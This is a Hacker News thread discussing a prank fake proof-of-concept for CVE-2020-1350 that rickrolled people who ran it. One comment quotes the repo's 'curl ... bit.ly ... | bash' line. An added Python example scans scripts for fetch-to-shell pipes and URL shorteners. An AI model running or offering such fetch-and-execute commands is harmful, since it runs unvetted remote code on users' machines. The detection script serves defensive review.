
The day I trolled the entire internet: accidental research project CVE-2020-1350 - beefhash
https://blog.zsec.uk/cve-2020-1350-research/
======
kerng
This post requires a lot of context to make sense of. Unless you are in
the security space and familiar with what happened in the last 36 hours, it
probably won't make much sense quickly.

1) Microsoft has a critical flaw in DNS server

2) A security company publishes the info - no public exploit available at this
point

3) Someone creates a fake exploit - playing a prank on hackers and other
security companies

4) Lots of people ran the prank code or helped spread the existence of the
fake exploit

Not sure if this makes it easier to understand - at least I tried. :)

------
speedgoose
This is very difficult to read and understand.

~~~
ogre_codes
That's my take. Just random garbage. There is a thread of something in there,
but I don't have the time/energy to quite get it. Something about a fake
hack, Rickrolling, and piping curl to the shell. Beyond that I gave up because
it's too poorly organized.

~~~
greenshackle2
Yeah they completely fail to explain the context.

CVE-2020-1350 is a real vulnerability that was published just yesterday:

[https://nvd.nist.gov/vuln/detail/CVE-2020-1350](https://nvd.nist.gov/vuln/detail/CVE-2020-1350)

It's a brand new vuln so people would be interested in a proof of concept. The
author created a git repo that was nominally a PoC exploit for this
vulnerability but was really just a troll, and publicized it on Twitter.

Some people ran the "proof of concept" code without reading it first and got
trolled. If the author had been malicious they could have done something much
worse than rickrolling.

The repo also contains a real fix for the vulnerability.

This is a particularly "amusing" troll because the sort of people who keep up
with CVEs and look for proof-of-concept exploits should really know better
than to run random code they just got off GitHub without checking what it
does.

It's obvious with the most _cursory_ examination of the code in the repo that
you shouldn't run it; exploit.sh contains:

    curl -L https://bit.ly/3exifav | bash

------
stedaniels
Took one glance at the shell script piping curl to bash and red flags went up
everywhere! Not only piping curl to bash, but doing it via a bit.ly link. Then
Twitter and the media started to pick it up and pass it on unverified. I
should have been shocked, but I wasn't. I'd love to see the bit.ly stats for
the short URLs added to the article.
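
The two red flags raised in the comments above (a remote fetch piped straight into a shell, and a URL shortener hiding the destination) can be checked statically before anything from a downloaded "PoC" is run. This is an added example, not part of the thread or the repo; the shortener list, the pattern set and the sample script are assumptions constructed for illustration, with only line 3 of the sample taken from the exploit.sh line quoted above.

```python
import re

# Assumed, non-exhaustive list of URL-shortener hosts (illustration only).
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd"}
FETCHERS = r"(?:curl|wget)"
SHELLS = r"(?:ba|z|da|k)?sh|python[0-9.]*|perl|ruby"

# fetcher ... | [sudo] interpreter
PIPE_TO_SHELL = re.compile(rf"\b{FETCHERS}\b[^|;\n]*\|\s*(?:sudo\s+)?(?:{SHELLS})\b")
# interpreter ... $(fetcher ...), <(fetcher ...) or `fetcher ...`
SUBST_TO_SHELL = re.compile(rf"\b(?:{SHELLS})\b[^\n]*(?:\$\(|<\(|`)\s*{FETCHERS}\b")
URL_HOST = re.compile(r"https?://([^/\s'\"]+)")

# Constructed sample script; it is only scanned as text, never executed or fetched.
SAMPLE = """#!/bin/bash
# constructed sample; line 3 is the exploit.sh line quoted in the thread
curl -L https://bit.ly/3exifav | bash
curl -fsSL https://example.com/install.sh -o install.sh
bash <(wget -qO- https://example.com/setup.sh)
echo done
"""

def review_script(text):
    """Return (line_no, reason, line) findings for a script's text without running it."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks, comments and the shebang
        if PIPE_TO_SHELL.search(line) or SUBST_TO_SHELL.search(line):
            findings.append((no, "remote-fetch-to-interpreter", line))
        for host in URL_HOST.findall(line):
            if host.lower() in SHORTENERS:
                findings.append((no, "url-shortener", line))
    return findings

if __name__ == "__main__":
    for no, reason, line in review_script(SAMPLE):
        print(f"line {no}: {reason}: {line}")
```

A clean result only means these two patterns were not found; the script still needs to be read, and run in a disposable VM if it is run at all.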

------
3pt14159
I'm sure people are stupid, I've seen it myself too many times to count, but
how does he know that these weren't executed in a VM? A couple hundred shells
isn't so much that I'd rule out that some non-trivial fraction of them were
under analysis.

------
petercooper
I imagine the reason this doesn't happen too often in serious domains is
because the next time the person says/posts anything, will they be believed
without checking their claims? Of course, in security, this may even be a good
thing?(!) :-)

------
Sodman
I think the interesting thing here is that outlets like Vulcan picked it up
and wrote about it with authority. Linking to the repo from these "trusted"
sources likely gave it a lot more credibility than it would otherwise have
received.

------
dapids
Is the blog post fake too? Seriously, this was hard to read...

------
floatingatoll
I was unable to scroll this article on mobile to read it. It seems like it
could be interesting, but it’s too bad about the technical obstacles to doing
so.

------
_tk_
With the numbers shown "the entire internet" is really more than exaggerated
and thus the title seems pretty clickbait-y.

------
curiousgal
TL;DR: posted fake PoC on GitHub. (I think, the post is littered with embedded
tweets and memes, super hard to read or make sense of any of it)

~~~
kevsim
Yeah, I think that's the gist. Fake PoC of a CVE, people ran random code,
author caught them in the act via a canary token [0] and rickrolled them.

0: [https://blog.thinkst.com/p/canarytokensorg-quick-free-detect...](https://blog.thinkst.com/p/canarytokensorg-quick-free-detection.html)

